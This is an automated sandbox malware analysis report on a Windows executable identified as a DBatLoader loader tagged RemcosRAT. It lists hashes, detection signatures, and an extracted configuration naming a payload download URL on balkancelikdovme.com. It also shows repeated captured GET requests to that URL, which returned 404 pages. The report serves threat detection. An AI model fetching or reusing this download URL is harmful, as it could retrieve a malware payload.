Edit tour

Windows Analysis Report
r096teIe1H.exe

Overview

General Information

Sample Name:	r096teIe1H.exe
Original Sample Name:	53e4ef9bed0e669de506d72e339fa3f36534aef9d10519491d0f0acea27b8841.exe
Analysis ID:	1296092
MD5:	b1e794e29881f56a4e9afa213d7c622d
SHA1:	7f5991e1e24a29eff5fad62b33e05fcff2eb0988
SHA256:	53e4ef9bed0e669de506d72e339fa3f36534aef9d10519491d0f0acea27b8841
Tags:	exeRemcosRAT
Infos:

Detection

DBatLoader

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Yara detected DBatLoader

Multi AV Scanner detection for submitted file

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

C2 URLs / IPs found in malware configuration

Machine Learning detection for sample

Creates a DirectInput object (often for capturing keystrokes)

Uses 32bit PE files

Sample file is different than original file name gathered from version info

Extensive use of GetProcAddress (often used to hide API calls)

Tries to load missing DLLs

Contains functionality to query locales information (e.g. system language)

Uses a known web browser user agent for HTTP communication

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Contains functionality to launch a process as a different user

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Classification

Process Tree

System is w10x64

r096teIe1H.exe (PID: 6876 cmdline: C:\Users\user\Desktop\r096teIe1H.exe MD5: B1E794E29881F56A4E9AFA213D7C622D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DBatLoader	This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.	No Attribution	https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html https://malcat.fr/blog/exploit-steganography-and-delphi-unpacking-dbatloader/ https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader https://news.sophos.com/en-us/2020/09/24/email-delivered-modi-rat-attack-pastes-powershell-commands https://www.netskope.com/blog/dbatloader-abusing-discord-to-deliver-warzone-rat	https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Malware Configuration

Threatname: DBatLoader

{"Download Url": "http://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
r096teIe1H.exe	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security

Unpacked PEs

Source	Rule	Description	Author
0.2.r096teIe1H.exe.220056c.0.raw.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
0.0.r096teIe1H.exe.400000.0.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
0.2.r096teIe1H.exe.3260000.1.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
0.2.r096teIe1H.exe.220056c.0.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: r096teIe1H.exe

Avira: detected

Found malware configuration

Source: r096teIe1H.exe

Malware Configuration Extractor: DBatLoader {"Download Url": "http://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk"}

Multi AV Scanner detection for submitted file

Source: r096teIe1H.exe	ReversingLabs: Detection: 57%
Source: r096teIe1H.exe	Virustotal: Detection: 56%			Perma Link

Antivirus detection for URL or domain

Source: http://balkancelikdovme.com/LL	Avira URL Cloud: Label: malware
Source: http://balkancelikdovme.com/	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: balkancelikdovme.com	Virustotal: Detection: 17%			Perma Link
Source: http://balkancelikdovme.com/	Virustotal: Detection: 17%			Perma Link

Machine Learning detection for sample

Source: r096teIe1H.exe

Joe Sandbox ML: detected

Source: r096teIe1H.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: C:\Users\user\Desktop\r096teIe1H.exe

Code function: 0_2_032658CC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

0_2_032658CC

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk

Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com

Source: Joe Sandbox View

ASN Name: GYRONGB GYRONGB

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Wed, 23 Aug 2023 18:15:38 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Wed, 23 Aug 2023 18:15:48 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Wed, 23 Aug 2023 18:15:48 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Wed, 23 Aug 2023 18:15:58 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Wed, 23 Aug 2023 18:16:08 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 